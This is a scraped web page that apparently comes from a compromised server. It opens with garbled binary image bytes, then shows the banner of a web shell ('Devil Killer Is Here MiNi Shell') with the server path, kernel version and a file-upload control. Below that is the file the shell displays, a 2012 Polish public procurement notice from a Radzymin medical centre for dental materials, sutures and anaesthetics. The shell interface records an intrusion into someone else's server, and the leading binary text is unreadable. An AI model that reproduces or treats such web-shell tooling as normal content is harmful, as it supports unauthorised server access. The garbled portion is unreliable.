JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120919/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120919/355626-N-2012.html

<p class="kh_header"><b>Radzymin: Zakup i dostawa sprzętu i materiałów stomatologicznych, nici chirurgicznych i  leków</b><br>
<b>Numer ogłoszenia: 355626 - 2012; data zamieszczenia: 19.09.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> nieobowiązkowe</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Centrum Medyczne im. Bitwy Warszawskiej 1920 r.w Radzyminie Samodzielny Publiczny Zespół Zakładów Opieki Zdrowotnej , ul. Konstytucji 3 Maja 17, 05-250 Radzymin, woj. mazowieckie, tel. 22 7865037, faks 22 7865037.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.spzzoz-radzymin.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Zakup i dostawa sprzętu i materiałów stomatologicznych, nici chirurgicznych i  leków.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiot zamówienia w zakresie zadania nr 1 dotyczy   Produkty lekarskie  
1.	Eugenol - płyn gęstość  w 20o C  1,064 gm  cm3 	10 g	10 szt.
2.	Xylonor 3%   znieczulenie Noradrenaline	50x1,8	8 op.
3.	Biopulp  10 g	10 g	5 szt.
4.	Cause  4731 - Caustinerf  pasta do dewitalizacji  CAUSTTINERF   FORT	4,5 g	7 szt.
5.	Hydrol  płyn 	45 ml	2 szt.
6.	SPONGOSTAN    DENTA   - wymagany  CERTYFIKAT (1x1x1cm)	24 szt.	8 op.
7.	Solcoseryl  pasta do jamy ustnej	5g	10op.
8.	Recestyphine  płyn	13 ml	2 szt.
9.	Nipas	50 tab.	2 op.
10.	  Calcipulpe	1,7 g	5 szt.
11.	Cresophen	13 ml	4 szt.
12.	Alustin   płyn	10 g	4 szt.
13.	Tlenek cynku gęstość w 20o C 5,47 g cm3 	60 g	15 szt.
14.	OARI - 6735  Carident  maść	5 g	3 op.
15.	Devipasta	5 g	6szt
16.	Helioseal	1, 25 g	10 szt.
17.	Ubistezin forte 4 %	50 am.	4 op.
18.	Ubistezin   4%	50am.	3 op.
19.	Scandonest 3%  5 vs 	50amp.	3 op. 
20.	Alvogyl	12g	5 szt.
21.	Metronidazol	5 g	10 szt.
22.	Wodorotlenek wapnia	10 g.	5 op.
23.	Mepivastesin 3%	5 amp.	3 op.
24.	Oxyddentin	250 g.	3 op.
25.	Citooartin 100     4%	50amp.	3 op.
26.	Dexadent	5 g.	5 szt.
27.	Pulpomixine	5g.	6 szt.
28.	Kamfenol	15 ml	4 szt.
29.	Tymol	10 g	2 szt.
30.	Sachol żel	10 g	10 szt.
31.	Tempophore	7 g	3 szt.
32.	Jodoform	30 g	2 szt.
33.	Grinazole	4,5 g	2 szt.

Przedmiot zamówienia w zakresie zadania nr 2 dotyczy  Wiertła
1.	Pilniki Hedstroem  do lecz. kana. roz.015-04  	6 szt. 
op.	10 op.
2.	Pilniki K-File rozmiar 25 WAIL	6 szt. 
op.	10 op.
3.	Pilniki K-File rozmiar 20 WAIL 	6 szt. 
op.	10 op.
4.	Wiertła diamentowe  kulka do turbiny rozm. 09		10 szt
5.	Wiertła diamentowe  rozmiar 012		40 szt.
6.	Wiertła diamentowe  rozmiar  014		60 szt
7.	Wiertła diamentowe  rozmiar  016		40 szt.
8.	Wiertła diamentowe  rozmiar  021		20 szt.
9.	Wiertła diamentowe  rozmiar   023		20 szt.
10.	Miazgo ciągi  VDW   do leczenia kanałowego		30 szt.
11.	Wiertło z węglika spiekanego do kątnicy rozm. 014 		15 szt
12.	Wiertło z węglika spiekanego do kątnicy  rozmiar  016		15 szt.
13.	Wiertło z węglika spiekanego do kątnicy rozmiar   018		15 szt.
14.	 Wiertło z węglika spiekanego do kątnicy rozmiar 021		15  szt
15.	Wiertło z węglika spiekanego do kątnicy rozmiar 023		15  szt
16.	Wiertło diamentowe - kulka do turbiny  rozm. 010		15 szt.
17.	Wiertło diamentowe - kulka do turbiny rozm.  014		20 szt.
18.	Wiertła ( odwrotny stożek)		30 szt.
19.	Poszerzacze do leczenia kanałowego	6 szt.	10 op.
20.	Igły Millera	10 szt.	
21.	Igły Lentullo	20 szt.	
22.	Ostrze do scalera	6 szt.	.

Przedmiot zamówienia w zakresie zadania nr 3 dotyczy  Wypełnienia
1.	Wypełnienia światłoutwar. XRV XRV Herculite- sds. kexs. 80g. General	6 szt. op	 4 op.
2.	Wypełniacze hemo-utwardz. Charisma PPS 	24 g	8 op.
3.	Solo Bond Opti Materiał wiążący do wypełniacza	3 ml	20 szt.
4.	Amaclap Plus  Nr 1	50 szt.	70 op.
5.	AMALCAP   PLUS   2	50 szt.	70 op.
6.	Ketac- MOLAR  wypeł. glasonomer 	12,5 g	2 op.
7.	Revolutin Nr. A2 wyp. do ubytków szyjkowych 	1 g	5 szt.
8.	Revolution Nr A3 	1 g	5 szt.
9.	CAVIT - czerwony  wypełnienie czsowe	28 g	5 szt.
10.	Gutta Pechcha .WDW  rozm.ASS 15-40 wypeł. kana		10 op.
11.	Endomethzone N.  wypeł. Kanałowe	14 g	10 szt.
12	XRV  HERCULITE  strzykawka  5g x 40
op. 80 g  Generał	16 szt.	 10 op.

13.	GRADIA  DIERECT  Strzykawka  2,7 ml.	4 g.	30 szt.
14.	G-BOND  Zestaw starter  (butelka)	50 ml	15 szt.
.

Przedmiot zamówienia w zakresie zadania nr 4 dotyczy: Narzędzia stomatologiczne
1.	Pol. Kleszcze ekstrakcyjne Meisner	5 szt.
2.	Upychadło do amolgamotu	5 szt.
3.	Nakładacz stomatologiczny 
(N.K. - szerokość)	10 szt.
4.	Podgryzacz kostny - LUER	1 szt.
5.	Trzonek do lusterek	15 szt.
6.	Upychadło kulkowe dwustronne 	15 szt.
7.	POL. Pinceta anatomiczna  
140 mm do 145 mm	20 szt
8.	Zgłębnik stomatologiczny 	20 szt .
9.	Pęseta stomatologiczna	20 szt
10.	Upychadło POL. IWTECH	20 szt.
11.	Pojemnik na watę metalowy	2 szt.
12.	Dźwignia Bein POL- IWITECH	6 szt
13.	Kleszcze POL .  IWITECH  Berteny	6 szt
14.	Przyłbica ochronna CERKAMED	5 op.
15.	Nożyczki do dziąseł	2 szt.
16.	Tacki stomatologiczne jednorazowe małe	10 000 szt.
17.	Upychadło do przenoszenia amalgamotu	4  szt.
18.	Łopatka Heidemanno  ( 139 - 011)	10 szt.

Przedmiot zamówienia w zakresie zadania nr 5 dotyczy:  Podkład cement
1.	THYMODENTIN	100 g.	15 szt.
2.	ADHESOR  CARBOFINE  cement	80 g	5 szt.
3.	AGATOS  cement szybkowiążący 	30 g	10 op.
4.	Ultra Blend Plus  biały	1,2 ml	15 szt.
5.	LIFE	24 g	4 op.
6.	Ketac - cement  33 +12x1		6 op.
7.	G.C  FUII   1-1  9	15 g	3 op.
8.	Ketac Molar Easymix
( proszek 12,5 g  +  płyn 8,5 ml)		4 szt.

Przedmiot zamówienia w zakresie zadania nr 6 dotyczy  Materiały do protetyki
1.	KROMOPAN  masa do wycisków	0,5 kg	50 szt.
2.	ZETA   plus   zestaw	  1 kg.	 5 kg.
3.	ORANWASH   L 	140 ml	30 szt.
4.	INDURENT -  katalizator	60 ml	30 szt.
5.	Stomaflex Katalizator 	175 g	20 szt.
6.	Stomaflex  LIGMT 	130 g.	30 szt.

Przedmiot zamówienia w zakresie zadania nr 7 dotyczy  Inne materiały stomatologiczne
1.	Sączki papierowe WDW rozm.15-40 Papier Poinst		15 op.
2.	Żel do fluoryzacji 
ELMEX   215 G
Duże tubki   	215 g. 	30 op.
3.	Fluor Protektor lakier do lakierowania zębów  1ml AMP	1,0 ml.	300 szt.
4.	Końcówki do ślinociągów		70 op.
5.	Paski do formówki tłoczone  KONOPKA  rozm. 21		10 op.
6.	Paski do formówki tłoczone KONOPKA rozm.  22		4 op.
7.	Paski do formówki tłoczone  KONOPKA rozm.  23		4 op.
8.	Paski do formówki tłoczone KONOPKA rozm.  24		4 op.
9.	Gumki do polerowania     POLONT		50 szt
10.	Pasek metalowy w rolce - drops		10 op.
11.	Płytka do  mieszania cementu 		7 szt.
12.	Płytka Petiego Fi  100 		4 szt.
13.	Płytka Petiego Fi  60 		12 szt.
14.	Lusterka stomatologiczne powiększające  4 mm		25 szt.
15.	Olej do smarowania końcówek NSK 	550 ml	4 szt.
16.	SOFLX  -  krążki ścierne  8691 C (do pol. wypeł)		12 op.
17.	Nici RE-CORD  300 cm  z wbudowanym nożykiem Egipska bawełna- sprężystość A	300 cm	8 szt.
18.	Serwetka składana 	125 szt	10 op.
19	DURAPHAT  Tuba 	10 ml.	 10 szt.
20.	Pędzelki do lakierowania  MICRO		15 op.
21.	Kształtki poliestrowe  ANGEGYA  	160 	8 op.
22.	Pasta Clean Polish  360 ( pasta do czyszcze. zębów)	50 g	6 szt.
23.	Paski do formówki profil.  KONOPKA rozm. Nr 2		2 op.
24.	Paski do formówki profilo. KONOPKA  rozm. Nr 3		4 op.
25.	Paski do formówki profilo. KONOPKA rozm. Nr 9		2 op.
26.	Paski do formówki profilo.  KONPKA  rozm. Nr 12		2 op.
27.	Paski do formówki profilo. KONOPKA rozm. Nr 13		4 op.
28.	Kalka artykulacyna I FORM. 80 MIC  ( HAN) 		10 op.
29.	Wytrawiacz  10 MML - żel	13 g	20 szt.
31.	Taśma poliestrowa gładka 	15 m.	6 szt.
32.	Szczotka nylon  prosta 		20 szt.
33.	Szczotka nylon  ścięta 		20 szt.
34.	Łopatka do alginatów 		4 szt.
35.	Szczotka metalowa do wierteł		6 szt.
36.	Endogel	5,5 g	4 szt.
37.	Taśma poliestrowa ścierna 	15 m.	4 szt.
38.	POL. Formówka Typ  MIFAM		2 szt.
39.	Formówka Białostocka		3 szt.
40	Pojemnik do sterylizacji wierteł		2 szt.
41.	Wanienka do dezynfekcji  5 l	5 l	1 szt.
42.	SOFLEKS trzymadełko 8695 CA
		2 szt.
43.	ANG Kształtki poliestrowe  	32	1 op. 
44.	Igły do karpuli TERUMO 030x16 mm	100 szt	3 op. 
45.	Igły do karpuli   0,27   6 x1 3,8 (0,40x0,35 mm)		2 op.
46.	Igły MOLTENI-Jet  30 x 12 	100 szt.	4 op.
47.	Palnik spirytusowy		2 szt.
48.	Łańcuszek do serwet  ( 50 cm)		4 szt.
49.	Miska do alginatów		4 szt.
50.	Gumki protetyczne		20 szt.
51.	Cevitec  Gel	20 g.	10 szt.
52.	Łyżki protetyczne		30 szt.
53.	Trzonek do pędzelków		30 szt.
54.	Formówka na pasku		2 op.
55.	Kolornik protetyczny		1 szt.
56.	Gumki do polerowania akrylu ( do wstępnego i do wygładzeń)		50 szt.
57.	Preparat do wybielania zębów martwych (Peroxydonte + gliceryna)		2 op.
58.	Paski metalowe do for mówki -  grubość 0.035 mm PRAKTOR ( komplet)		3 szt.
59.	 Cewki dokanałowe ( mosiężne - pozłacane) opakowanie asortyment 12 rozmiarów	240 szt.	1 op.
60.	Wkłady kaarowo - korzeniowe z włókien szklanych o różnej średnicy		2 op.
61. 	Spinacze do włókien szklanych  ARKONA 2 x 6 szt. w op. 		1 op.

62.	Włókno szklane do szynowania zębów SPLINT-it  ( op. poj. jedno włókno 7,5 cm  szre. 3 mm)		5 op. 
63.	PUR - ZELLIN		60 szt
64.	Żel do fluoryzacji  Fluormex	50 g	350 szt.
65.	Cervitec Plus	2 g	10 szt.
66.	Światłoutwardzalne  włókno fromowane typ PODWIĄZKA  długość 10 cm, szerokość 2 mm		3 op.

Przedmiot zamówienia w zakresie zadania nr 8 dotyczy  Nici chirurgiczne   (non - apsorbable) 
1.	2 0 
(non - apsorbable) poliamidowe	45 cm	igła ostra  3 8 koła 19 mm	niebieskie	
100
2.	3 0
(non - apsorbable) poliamidowe, 	45cm	igła ostra  3 8 koła 19 mm	niebieskie	
300
3.	 4 0
(non - apsorbable) poliamidowe, 	45 cm 
	igła ostra 3 8 koła 19 mm	niebieskie	
500  

4.	5 0
(non - apsorbable), poliamidowe  	45 cm
	igła ostra  3 8 koła 16 mm	niebieskie	
600 

5.	 6 0
(non - apsorbable) poliamidowe, 	45 cm	igła ostra, kosmetyczna  3 8 koła 16 mm  	niebieskie	

600.

Przedmiot zamówienia w zakresie zadania nr 9 dotyczy:  Nici chirurgiczne   (apsorbable)
1	3 0 
(apsorbable) glyconate monofilament 	70 cm
	igła tępa 3/8 koła 16 mm	niebieskie	100
2	4 0 
(apsorbable) glyconate monofilament 	70 cm
	 igła tępa, 
3 8 koła 16 mm	niebieskie	100
3	5 0
 (apsorbable) glyconatemonofilament 	70 cm	igła tępą
3 8 koła 16 mm, 
	niebieskie	70 
4	6 0 
(apsorbable) glyconate monofilament	70 cm	igła tępa 3 8 koła 16 mm	niebieskie	50 .

Przedmiot zamówienia w zakresie zadania nr 10 dotyczy  Leki znieczulające  
1.	Lignocaina  2%    20 mg ml   op. 10 amp.	2 ml	70  szt.
2.	Lignocaina 2%          
c  noradrenalino   (20 mg + 0,025 mg)   ml     	2 ml	300 szt..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>20 % wartości zamówienia podstawowego.</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 33.69.80.00-9, 33.13.15.10-5, 33.14.18.30-7, 33.13.10.00-7, 33.14.18.30-7, 33.13.00.00-0, 33.13.00.00-0, 33.14.11.21-4, 33.14.11.21-4, 33.66.11.00-2.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 10.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>

<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">koncesję, zezwolenie lub licencję</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY , USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane dostawy, usługi lub roboty budowlane odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;">próbki, opisy lub fotografie</li>

<li style="margin-bottom: 12px;">zaświadczenie niezależnego podmiotu zajmującego się poświadczaniem zgodności działań wykonawcy z europejskimi normami zarządzania środowiskiem, jeżeli zamawiający wskazują środki zarządzania środowiskiem, które wykonawca będzie stosował podczas realizacji zamówienia na roboty budowlane lub usługi, odwołując się do systemu zarządzania środowiskiem i audytu (EMAS) lub norm zarządzania środowiskiem opartych na europejskich lub międzynarodowych normach poświadczonych przez podmioty działające zgodnie z prawem Unii Europejskiej, europejskimi lub międzynarodowymi normami dotyczącymi certyfikacji</li>

</ul>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.spzzoz-radzymin.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Centrum Medyczne im. Bitwy Warszawskiej 1920 r. w Radzyminie - 
ul. Konstytucji 3 Maja 17
05-250 Radzymin
budynek przychodni II piętro pok. 214.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 26.09.2012 godzina 10:30, miejsce: Centrum Medyczne im. Bitwy Warszawskiej 1920 r. w Radzyminie - 
ul. Konstytucji 3 Maja 17
05-250 Radzymin
budynek przychodni II piętro pok. 214.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> do 26.10.2012.</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Produkty lekarskie.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Szczegółowo określone w załączniku Nr 1 do SIWZ..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.69.80.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
